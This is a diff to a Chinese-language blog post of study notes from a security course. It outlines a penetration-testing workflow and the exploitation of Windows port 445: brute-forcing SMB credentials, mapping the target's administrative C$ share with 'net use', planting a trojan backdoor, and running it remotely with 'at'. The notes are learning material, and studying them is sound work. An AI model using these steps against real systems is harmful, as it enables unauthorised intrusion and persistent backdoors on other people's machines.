--- a/_posts/2020-5-2-day_09.md
+++ b/_posts/2020-5-2-day_09.md
@@ -1,7 +1,7 @@
 ---
 layout:     post
 title:     day_09
-subtitle:  渗透测试简单流程
+subtitle:  渗透测试简单流程、445端口的利用
 date:       2020-5-2
 author:     One-Punch-Man
 header-img: "img/man-6.jpg"
@@ -10,3 +10,31 @@ tags:
      - 网络安全
      - 千锋教育
 ---
+
+# 渗透测试的简单流程
+
+1. 授权
+2. 信息收集
+   - nslookup
+   - whois
+3. 扫描漏洞
+   - namp
+4. 漏洞利用
+5. 获取权限
+6. 渗透测试报告
+
+# 445端口的利用
+
+1. 扫描端口的开放；
+   - `telnet IP地址 端口`：手工测试端口是否开放。
+   - 使用扫描软件`scanport`、`namp`。
+2. 使用`NTscan`软件暴力破解账户和密码；
+3. 建立磁盘映射；
+   - `net use \\IP地址\ipc$ 密码 /user:administrator`：与目标空连接进行磁盘映射，可以对对方所有的磁盘进行操作。
+   - `net use f: \\IP地址\c$ 密码 /user:administrator`：使用`f盘`作为目标`C盘`的映射地址。
+   - `net use * /del`:删除所有的磁盘映射。
+4. 制作木马
+5. 植入木马（留后门）
+6. 设计任务计划
+   1. `net time \\IP地址`
+   2. `at \\IP地址 时间 "路径"`
